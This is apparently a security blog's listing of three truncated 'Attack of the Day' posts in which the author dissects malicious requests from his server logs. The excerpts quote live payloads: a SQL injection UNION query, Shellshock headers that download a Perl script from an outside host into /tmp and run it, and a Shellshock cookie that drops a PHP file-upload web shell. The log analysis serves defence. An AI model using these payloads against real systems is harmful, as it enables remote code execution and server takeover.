We Call Him “Little Bobby Tables”

Posted 1 CommentPosted in Attack of the Day

Every time someone makes a reference to SQL Injection, I think of this xkcd cartoon: WOOT Actually, w00t will be a different day..  Today is all about SQL Injections.  These kinds of things show up in the logs all the time.  Almost as frequently as the ShellShock folks, far more frequently than people that donate code via ShellShock.  I digress.. GET /index.php?option=com_hdflvplayer&id=1+AND+1=2+UNION+SELECT+concat%2812,0x3a,32%29,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21– HTTP/1.0 Host: planetspork.com X-Cnection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 X-Forwarded-For: 109.201.154.143 Looking at the “GET” portion of the request, it’s pretty easy to […]

Shh.. Be very, very Quiet. We’re Hunting Rabbits

Posted Leave a commentPosted in Attack of the Day

** Standard Warnings Apply ** Let me help you understand.. When this rolled in today I was thinking, “Oh, another shellshock attempt.  I wonder which code base they’ll be attempting to deliver today?”  I wouldn’t have even posted this weren’t it for the payload contained at the other end of this URL. GET / HTTP/1.0 Host: www.planetspork.com Accept-Encoding: identity Referer: () { ignored;};/bin/bash -c ‘wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go’ Cookie: () { ignored;};/bin/bash -c ‘wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go’ Content-type: application/x-www-form-urlencoded X-Forwarded-For: 173.15.11.25 Once opened, I […]

This Seems Interesting..

Posted 2 CommentsPosted in Attack of the Day

** Standard Warnings Apply ** Let me help you understand.. This one arrived in the log bucket the other day..  Things happen and it got stuffed in the “Drafts” folder for a while and I’m finally getting back around to looking at it. GET /cgi-bin/php5.cgi HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: www.planetspork.com Accept: */* Cookie: () { test;}; echo \'<?php if(md5($_SERVER[\”HTTP_USER_AGENT\”]) !== \”49de371511c1de3bde34b0108ec7f129\”){die(\”04030\”);} if (isset($_FILES[\”file\”])){ $z = $_FILES[\”file\”][\”name\”]; move_uploaded_file($_FILES[\”file\”][\”tmp_name\”],$z); header(\”Location: $z\”); exit(); }?><html><body><form action=\”<?php echo basename(__FILE__); ?>\” method=\”post\” enctype=\”multipart/form-data\”><label for=\”file\”>Filename:</label><input type=\”file\” name=\”file\” id=\”file\”><br><input type=\”submit\” name=\”submit\” […]